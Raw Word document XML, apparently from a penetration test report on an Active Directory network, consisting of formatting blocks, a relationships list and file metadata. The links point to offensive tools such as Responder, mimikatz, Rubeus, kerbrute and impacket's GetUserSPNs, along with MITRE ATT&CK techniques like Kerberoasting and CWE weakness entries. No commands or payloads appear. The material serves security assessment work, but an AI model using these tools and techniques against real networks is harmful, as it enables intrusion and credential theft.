                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1383560219">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1294218896">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="971791894">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="118107492">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1882742432">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="914776916">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1035538622">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1515192395">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="958531694">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1913730385">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="111946274">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2055082059">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="319232178">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1951400497">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="681929040">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="996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1233">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1282880476">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1299188359">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1336570455">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1343434486">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1518040476">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1622803354">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1696730689">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1706639970">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1717503305">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1844779039">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="19448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loodHoundAD/BloodHound/tree/master/Collectors" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lgandx/Responder" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ropnop/kerbrute" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1083/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/693.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gentilkiwi/mimikatz" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/003/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hashcat/hashcat" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/003/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/521.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/auxiliary/scanner/http/tomcat_mgr_login/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec/"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lgandx/Responder" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/522.html" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1135/"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ecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hashcat/hashcat" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/522.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcommunity.microsoft.com/t5/itops-talk-blog/step-by-step-guide-how-to-configure-microsoft-local/ba-p/2806185" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/521.html" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/blog/articles/directory-listing-information-disclosur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attack.mitre.org/tactics/TA0005/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fox-it/BloodHound.py" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/548.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/001/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.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GhostPack/Rubeus" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/522.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=46899" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/001/" TargetMode="External"/><Relationship Id="rId4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E7BE-FCC1-4926-921C-DB1B84D1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10249</Words>
  <Characters>58420</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>486</Lines>
  <Paragraphs>137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53</cp:revision>
  <cp:lastPrinted>2022-06-24T09:23:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-18T11:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-24T09:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>